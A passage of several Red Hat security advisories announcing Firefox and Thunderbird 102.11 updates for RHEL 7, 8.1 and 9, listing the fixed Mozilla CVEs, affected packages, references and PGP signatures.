2196737 - CVE-2023-32206 Mozilla: Crash in RLBox Expat driver  
2196738 - CVE-2023-32207 Mozilla: Potential permissions request bypass via clickjacking  
2196740 - CVE-2023-32211 Mozilla: Content process crash due to invalid wasm code  
2196741 - CVE-2023-32212 Mozilla: Potential spoof due to obscured address bar  
2196742 - CVE-2023-32213 Mozilla: Potential memory corruption in FileReader::DoReadData()  
2196753 - CVE-2023-32215 Mozilla: Memory safety bugs fixed in Firefox 113 and Firefox ESR 102.11

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
thunderbird-102.11.0-1.el8_1.src.rpm

ppc64le:  
thunderbird-102.11.0-1.el8_1.ppc64le.rpm  
thunderbird-debuginfo-102.11.0-1.el8_1.ppc64le.rpm  
thunderbird-debugsource-102.11.0-1.el8_1.ppc64le.rpm

x86_64:  
thunderbird-102.11.0-1.el8_1.x86_64.rpm  
thunderbird-debuginfo-102.11.0-1.el8_1.x86_64.rpm  
thunderbird-debugsource-102.11.0-1.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32205  
https://access.redhat.com/security/cve/CVE-2023-32206  
https://access.redhat.com/security/cve/CVE-2023-32207  
https://access.redhat.com/security/cve/CVE-2023-32211  
https://access.redhat.com/security/cve/CVE-2023-32212  
https://access.redhat.com/security/cve/CVE-2023-32213  
https://access.redhat.com/security/cve/CVE-2023-32215  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZGQXiNzjgjWX9erEAQiHWw//ajvOZcTDGCJ+4O4WOLrInKQl1QUrneko  
4jfE8vi/IOiFFEvdl8oGYj1rROVVBmsR0R1hesHm76AHcCvqXcXQJNRx3k2zFkFU  
VFwkBFq4kkdmdAM08ZVY/oRz6BEqJT+yD4HxkIXwSi32U8i/bIl1W+g8Pw/2a99W  
lbwnoGPbnKMBDtQggpiSFVhDDHnamUkAVYUj6R2v9Q7BwFA9Hm4ir7+6/jbNUzZG  
jM3wllzLPp1Lhi+KzQosL09SKQPJ2rRbc4seBLTRFFdylu1qt6zB/qa+VHbcfByn  
mnVHnN95tj4DPhOxEDC5jfCKOC16+bXSK5x71ClaCjf6DwIqy6zpPredt1HMxB/U  
Q6oxhiMn9+N4/zoslO/5SpbPGibPQ5a+aiHHOlEY9LNlckKFFjxC1LnKxwV0pomV  
JPVtS1sLZuHpUI34hHDid9auwoeqzKEFEcJAkqtESXOHN8BhvSZfP5yiDbm5mKu7  
jHphcOvxt935M8pEc5zYHOumcKCiDD8Wug2TlGL9WNZglqKw03NRxDFIaFy0GMLX  
h2Zg4tts+2zgOe2ESYb44S0m9v4273eSgyMflbY89eFYnzTGdswiAr30cVRDnyvR  
L2Sn7eyNIeK73/OcH4btiuAEC0EXw/o+YKDk5GnDPNvRHp9nqvL6PhT36CX3wO4R  
0NGifNvNLUM=Noqz  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3152-01

Red Hat Security Advisory 2023-3138-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.11.0 ESR. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:3138-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3138  
Issue date:        2023-05-16  
CVE Names:         CVE-2023-32205 CVE-2023-32206 CVE-2023-32207  
                   CVE-2023-32211 CVE-2023-32212 CVE-2023-32213  
                   CVE-2023-32215  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - ppc64le, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.11.0 ESR.

Security Fix(es):

* Mozilla: Browser prompts could have been obscured by popups  
(CVE-2023-32205)

* Mozilla: Crash in RLBox Expat driver (CVE-2023-32206)

* Mozilla: Potential permissions request bypass via clickjacking  
(CVE-2023-32207)

* Mozilla: Memory safety bugs fixed in Firefox 113 and Firefox ESR 102.11  
(CVE-2023-32215)

* Mozilla: Content process crash due to invalid wasm code (CVE-2023-32211)

* Mozilla: Potential spoof due to obscured address bar (CVE-2023-32212)

* Mozilla: Potential memory corruption in FileReader::DoReadData()  
(CVE-2023-32213)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2196736 - CVE-2023-32205 Mozilla: Browser prompts could have been obscured by popups  
2196737 - CVE-2023-32206 Mozilla: Crash in RLBox Expat driver  
2196738 - CVE-2023-32207 Mozilla: Potential permissions request bypass via clickjacking  
2196740 - CVE-2023-32211 Mozilla: Content process crash due to invalid wasm code  
2196741 - CVE-2023-32212 Mozilla: Potential spoof due to obscured address bar  
2196742 - CVE-2023-32213 Mozilla: Potential memory corruption in FileReader::DoReadData()  
2196753 - CVE-2023-32215 Mozilla: Memory safety bugs fixed in Firefox 113 and Firefox ESR 102.11

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
firefox-102.11.0-2.el8_1.src.rpm

ppc64le:  
firefox-102.11.0-2.el8_1.ppc64le.rpm  
firefox-debuginfo-102.11.0-2.el8_1.ppc64le.rpm  
firefox-debugsource-102.11.0-2.el8_1.ppc64le.rpm

x86_64:  
firefox-102.11.0-2.el8_1.x86_64.rpm  
firefox-debuginfo-102.11.0-2.el8_1.x86_64.rpm  
firefox-debugsource-102.11.0-2.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32205  
https://access.redhat.com/security/cve/CVE-2023-32206  
https://access.redhat.com/security/cve/CVE-2023-32207  
https://access.redhat.com/security/cve/CVE-2023-32211  
https://access.redhat.com/security/cve/CVE-2023-32212  
https://access.redhat.com/security/cve/CVE-2023-32213  
https://access.redhat.com/security/cve/CVE-2023-32215  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZGQXc9zjgjWX9erEAQgQLQ//WDSrnqY65X9Z7UuItp6kvlGnIVeIplBE  
8AnuFdw9Np9RMRD8HfuUotRbFCtqiv4N/hUiNIKsfIh4R9lydALWZDlgIrjzPOLY  
KZXjs1JVJcqNcCKZxpCLxyamqR6MIqetD2HkcxrApGWphPRsYnvSmwKaHggAONw/  
DpRHa6VyYlA3BFT/cG5zwnNz9HVAl26aEIo0CooDdNvAYzv0kcjSO/pgC/Zrw4OG  
hnSfSDmVfWQedc9v1UqiAbQUsMfbN8lDj/c1T89laGyZZIJe5h5dG+lOVDdpAOSF  
XTYY595TouGFrcx7OBXRJHTAxxBaNwbMgfQExfDKKX3GRQ9LLbNcCC4wKhcM10Gj  
j4CFBnBQIK5ktYV+hCofPjLZuluF9tQxK9rmgFbttl0dNghQUOAZZ02ZEzsstdzQ  
cap9ZeJHUEuABrBepJH6jBgXyj0Ih2vKyh+0EsF+uhmoCSe6i48vwxWZs1Ns1HGu  
8Wl2jQ2DV2gsQTagPBtDRRALD6iNuvS1ukEQ9a4/m+f4UnrvqP3FIDvwH7kyA8j/  
xZ+aTatzqvDmyU8ObhyNXAc9SIJ2uU1B2oIP9gEi2w65q+VAG0nT1U3ujtFTZHVp  
2v0eKPKM5Sj0KKMbyZsrp+9Ay9YQ7/b+Pk4QBJsjnNOBBINsFRZc/1ToDGQwsoqB  
M3/zADpjqCc=Y/u0  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3138-01

Red Hat Security Advisory 2023-3151-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.11.0. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:3151-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3151  
Issue date:        2023-05-16  
CVE Names:         CVE-2023-32205 CVE-2023-32206 CVE-2023-32207  
                   CVE-2023-32211 CVE-2023-32212 CVE-2023-32213  
                   CVE-2023-32215  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64le, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.11.0.

Security Fix(es):

* Mozilla: Browser prompts could have been obscured by popups  
(CVE-2023-32205)

* Mozilla: Crash in RLBox Expat driver (CVE-2023-32206)

* Mozilla: Potential permissions request bypass via clickjacking  
(CVE-2023-32207)

* Mozilla: Memory safety bugs fixed in Firefox 113 and Firefox ESR 102.11  
(CVE-2023-32215)

* Mozilla: Content process crash due to invalid wasm code (CVE-2023-32211)

* Mozilla: Potential spoof due to obscured address bar (CVE-2023-32212)

* Mozilla: Potential memory corruption in FileReader::DoReadData()  
(CVE-2023-32213)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2196736 - CVE-2023-32205 Mozilla: Browser prompts could have been obscured by popups  
2196737 - CVE-2023-32206 Mozilla: Crash in RLBox Expat driver  
2196738 - CVE-2023-32207 Mozilla: Potential permissions request bypass via clickjacking  
2196740 - CVE-2023-32211 Mozilla: Content process crash due to invalid wasm code  
2196741 - CVE-2023-32212 Mozilla: Potential spoof due to obscured address bar  
2196742 - CVE-2023-32213 Mozilla: Potential memory corruption in FileReader::DoReadData()  
2196753 - CVE-2023-32215 Mozilla: Memory safety bugs fixed in Firefox 113 and Firefox ESR 102.11

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
thunderbird-102.11.0-1.el7_9.src.rpm

x86_64:  
thunderbird-102.11.0-1.el7_9.x86_64.rpm  
thunderbird-debuginfo-102.11.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

Source:  
thunderbird-102.11.0-1.el7_9.src.rpm

ppc64le:  
thunderbird-102.11.0-1.el7_9.ppc64le.rpm  
thunderbird-debuginfo-102.11.0-1.el7_9.ppc64le.rpm

x86_64:  
thunderbird-102.11.0-1.el7_9.x86_64.rpm  
thunderbird-debuginfo-102.11.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
thunderbird-102.11.0-1.el7_9.src.rpm

x86_64:  
thunderbird-102.11.0-1.el7_9.x86_64.rpm  
thunderbird-debuginfo-102.11.0-1.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32205  
https://access.redhat.com/security/cve/CVE-2023-32206  
https://access.redhat.com/security/cve/CVE-2023-32207  
https://access.redhat.com/security/cve/CVE-2023-32211  
https://access.redhat.com/security/cve/CVE-2023-32212  
https://access.redhat.com/security/cve/CVE-2023-32213  
https://access.redhat.com/security/cve/CVE-2023-32215  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZGQXstzjgjWX9erEAQh50A//QFlGYqgaEPQsSggYbY2ENj1xRZc5kyVM  
iuNxOCUKQksfBnbz8dFKlZCsBT1+xXnhtvUEov/gViXEt19j32aOUcBsAm1Kd0W+  
Sc5kELdH+zDNuxsMctfFiqrKB3WWwlqec2fll3I9q0YOcrQP8Tr1PkL7GnZK8FUn  
JsyGGijvorIgQ+bAsQDai4xD5EbZRqDyVq8l7rNGz04q1ojYdTaBTCWZtJHUJx+k  
31t0CpGJXE0lbAcPnoApLqFvkU6yW07xckSohXg8u0GHInaz6N7Dz9Um5WAazaIk  
4GLsZZq3pIjW3lvIbQ1FKW5M/+wBINGfDdpC+g+Xeca+fFe8zQwD4KoKQ8bph2OY  
uq3Y9AtHGP/Ngqc3DFJ8hE/bvBvXEvnlTJAb1UhZs2vz33ZU6v9f3HnFvt+Ie4Ja  
xSkstW/AY7YtVnPwALo3SeAgZl4TWeOPbYl8f3/BRPjlvp+kF88C6OeqUWDFyRNH  
CyS9UZlrFSz0ua4fyb3cziZxrXW/eXttlX1Scm07gDoJ7uSB5pggAjgjHMz1dQJN  
87/InHqFfk35zpsdJR6H1/taLc7fEGzasdKIYOrV36HTebRLvx77z/6rkCGMSmeP  
vdbWVwH6bpIGa0yKVWGjBg+lwv1xoiCxgoCRqlJXJ9Qm2bgweJ55HVdS3e5w8Q9+  
q73Lq1N0xjwNq  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3151-01

Red Hat Security Advisory 2023-3143-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.11.0 ESR. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:3143-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3143  
Issue date:        2023-05-16  
CVE Names:         CVE-2023-32205 CVE-2023-32206 CVE-2023-32207  
                   CVE-2023-32211 CVE-2023-32212 CVE-2023-32213  
                   CVE-2023-32215  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.11.0 ESR.

Security Fix(es):

* Mozilla: Browser prompts could have been obscured by popups  
(CVE-2023-32205)

* Mozilla: Crash in RLBox Expat driver (CVE-2023-32206)

* Mozilla: Potential permissions request bypass via clickjacking  
(CVE-2023-32207)

* Mozilla: Memory safety bugs fixed in Firefox 113 and Firefox ESR 102.11  
(CVE-2023-32215)

* Mozilla: Content process crash due to invalid wasm code (CVE-2023-32211)

* Mozilla: Potential spoof due to obscured address bar (CVE-2023-32212)

* Mozilla: Potential memory corruption in FileReader::DoReadData()  
(CVE-2023-32213)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2196736 - CVE-2023-32205 Mozilla: Browser prompts could have been obscured by popups  
2196737 - CVE-2023-32206 Mozilla: Crash in RLBox Expat driver  
2196738 - CVE-2023-32207 Mozilla: Potential permissions request bypass via clickjacking  
2196740 - CVE-2023-32211 Mozilla: Content process crash due to invalid wasm code  
2196741 - CVE-2023-32212 Mozilla: Potential spoof due to obscured address bar  
2196742 - CVE-2023-32213 Mozilla: Potential memory corruption in FileReader::DoReadData()  
2196753 - CVE-2023-32215 Mozilla: Memory safety bugs fixed in Firefox 113 and Firefox ESR 102.11

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
firefox-102.11.0-2.el9_2.src.rpm

aarch64:  
firefox-102.11.0-2.el9_2.aarch64.rpm  
firefox-debuginfo-102.11.0-2.el9_2.aarch64.rpm  
firefox-debugsource-102.11.0-2.el9_2.aarch64.rpm  
firefox-x11-102.11.0-2.el9_2.aarch64.rpm

ppc64le:  
firefox-102.11.0-2.el9_2.ppc64le.rpm  
firefox-debuginfo-102.11.0-2.el9_2.ppc64le.rpm  
firefox-debugsource-102.11.0-2.el9_2.ppc64le.rpm  
firefox-x11-102.11.0-2.el9_2.ppc64le.rpm

s390x:  
firefox-102.11.0-2.el9_2.s390x.rpm  
firefox-debuginfo-102.11.0-2.el9_2.s390x.rpm  
firefox-debugsource-102.11.0-2.el9_2.s390x.rpm  
firefox-x11-102.11.0-2.el9_2.s390x.rpm

x86_64:  
firefox-102.11.0-2.el9_2.x86_64.rpm  
firefox-debuginfo-102.11.0-2.el9_2.x86_64.rpm  
firefox-debugsource-102.11.0-2.el9_2.x86_64.rpm  
firefox-x11-102.11.0-2.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32205  
https://access.redhat.com/security/cve/CVE-2023-32206  
https://access.redhat.com/security/cve/CVE-2023-32207  
https://access.redhat.com/security/cve/CVE-2023-32211  
https://access.redhat.com/security/cve/CVE-2023-32212  
https://access.redhat.com/security/cve/CVE-2023-32213  
https://access.redhat.com/security/cve/CVE-2023-32215  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZGQXetzjgjWX9erEAQjeqhAAh/K0SyWl8IbZowaQrIVmgTZFH9DhymF7  
A/HdvrslYLvbJIODOobhYcx42BHv1lViEW5FwoHgP+Gozs3sJml01Dngs0RHxmzj  
oZNkDwzynlwvBX0Anp0lY4OvioAetRRM6h1rgNrhBYTcIHAEUHK5sGaON+biuy5T  
IpTDSESMV136ZkF8BkHX4rEqongYb35UvAb9hdy2fCuS1sYpi8qCYomCjsDuHI4P  
5bsGeWuxwz5Q6gpt+IwN4ObXYWEaqpFlT4FTGPVDKmcZeOKwFdpxkmSBO3/G5dqD  
iS3uu11y27QyKDL5vZ0atHRO+cc5TM5TY2VCmjXlyuXmnoVKZFT+Y+ZoWbgcIpYL  
TDgm0zbM7VdYAAtF46TEQvaysKdPJGBBxdi/NTlexZa1YUiLfSLWZwrPngNZaNB8  
/x8ZP7LNcO8iPTpBj98KFc/ttPwEeMHbNur97prZwprWHCGyNJVlhspf7YrSn5HB  
5mSlx2eZDC407s28EmueGY9hmYWWNOa6DQzCW2iZBJ6BpZqpY9BKdkQORUH1gbD0  
ggoFCMVeE9jSMm6evF7JORryp7gBBuoW9b7PZBHxzRJuIyMVwLBZnjy1z6XeMCoP  
KtvigAw6KP+/ZgSFVUgb9mfc7zyj04WDVeWwuJjTomnVjWDlaSUgnLrDGMx61Wsx  
25e+FwcsilY=oUqA  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#firefox